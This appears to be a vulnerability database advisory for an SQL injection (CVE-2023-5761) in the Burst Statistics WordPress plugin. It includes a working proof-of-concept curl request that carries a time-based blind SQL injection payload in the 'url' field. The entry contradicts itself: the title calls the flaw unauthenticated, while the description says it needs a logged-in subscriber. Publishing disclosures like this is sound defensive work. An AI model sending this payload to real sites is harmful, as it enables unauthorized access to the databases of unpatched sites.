Burst Statistics (Free < 1.5.0, Pro < 1.5.1) – Unauthenticated SQL Injection | CVE 2023-5761 | Plugin Vulnerabilities

Description

The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers

Proof of Concept

curl 'https://example.com/burst-statistics-endpoint.php' \
  -H 'content-type: text/plain;charset=UTF-8' \
  --data-raw $'"{\\"fingerprint\\":false,\\"uid\\":\\"437a969907141c6c2042731efd2da038\\",\\"url\\":\\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\",\\"time_on_page\\":6907,\\"completed_goals\\":[]}"' \
  --compressed

Affects Plugins

Fixed in 1.5.1

burst-statistics

Fixed in 1.5.0

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/30f8419c-c7b9-4c68-a845-26c0308d76f3

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

German Ritter

Verified

Yes

WPVDB ID

0c0ab92c-8fdd-4a58-814f-e974714a20c8

Timeline

Publicly Published

2023-12-06 (about 2 years ago)

Added

2023-12-11 (about 2 years ago)

Last Updated

2023-12-11 (about 2 years ago)

Other

Published

Title

Published

2022-02-01

Title

Conversios.io < 4.6.2 - Subscriber+ SQL Injection

Published

2024-12-13

Title

WP Job Portal < 2.2.3 - Authenticated (Admin+) SQL Injection

Published

2021-05-19

Title

FlightLog <= 3.0.2 - Authenticated (editor+) SQL Injection

Published

2024-12-23

Title

Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress < 1.1.22 - Authenticated (Contributor+) SQL Injection

Published

2022-03-23

Title

Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi